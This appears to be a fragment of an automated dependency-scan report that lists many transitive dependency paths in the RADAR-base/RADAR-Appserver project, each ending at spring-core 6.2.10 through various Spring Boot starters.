Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
